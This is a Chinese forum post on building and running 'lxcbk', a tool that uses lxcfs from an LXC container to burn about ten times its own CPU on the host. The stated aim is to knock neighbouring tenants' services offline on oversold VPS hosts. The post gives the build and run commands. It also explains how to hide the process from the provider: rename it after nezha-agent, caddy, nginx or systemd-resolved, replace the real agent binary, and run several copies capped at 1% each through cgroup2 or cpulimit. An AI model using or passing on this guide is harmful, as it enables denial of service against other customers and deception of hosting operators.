源码仓库:https://github.com/oplxc/lxcbenchmark
下载:
[ol]wget https://github.com/oplxc/lxcbenchmark/archive/refs/heads/main.zip[/ol]复制代码
解压:
[ol]unzip main.zip
mv lxcbenchmark-main/* .
make
chmod +x lxcbk[/ol]复制代码
实测线程调整为2有较高放大比例,不建议调整的过大。
[ol]export thd=2[/ol]复制代码
直接运行
[ol]./lxcbk[/ol]复制代码
在自己pve机器下开出来的lxc测试,放大比例(lxcfs(占用):lxcbk(目标程序占用))确实将近5-10倍。
在lxc超售太猛的机器上更加有效,放大比例更加很大。都能看到邻居探针更猛烈的掉线和仰卧起坐。
lxcbk(炸鸡程序)实测可以改名。不要用默认的lxcbk名称,改为nezha-agent或者caddy之类的。然后lxcbk替换掉默认的/opt/nezha/agent/nezha-agent。并且也可使用 /opt/nezha/agent/nezha-agent -s xxxxx.com:443 -p xxxxxxx伪装启动。这样老板在母鸡上ps很难揪出你的程序。
不过为了防止更能被揪出来。建议不要只依赖启动一个程序,启动多个程序,同时每个程序只占用1%的cpu,这样老板就更难揪出来了。
实测使用lxcbk替换以下程序,/usr/local/bin/caddy,/usr/local/bin/xray,/lib/systemd/systemd-resolved,/sbin/nginx。
然后再使用cpu限制模式启动,鸡主很难发现。
可以用1%占用启动多个程序,这样就不容易被发现。
建议方法cgroup2限制,不容易发现:
[ol]mkdir /sys/fs/cgroup/cgroupbk
echo "1000 100000" | sudo tee /sys/fs/cgroup/cgroupbk/cpu.max
setsid /usr/local/bin/caddy run &
new_pid=$!
echo $((new_pid + 1)) > /sys/fs/cgroup/cgroupbk/cgroup.procs[/ol]复制代码
备用方法cpulimit,有发现风险:
[ol]cpulimit --limit 1 -- /usr/local/bin/caddy run[/ol]复制代码
/usr/local/bin/caddy是伪装的程序,实测lxcbk可以伪装为任何程序。然后启动多个不同名称的伪装程序实行炸鸡。
lxcbk对母鸡的放大比例能达到10倍,炸鸡程序占用1%,母鸡会占用10%左右。真的有效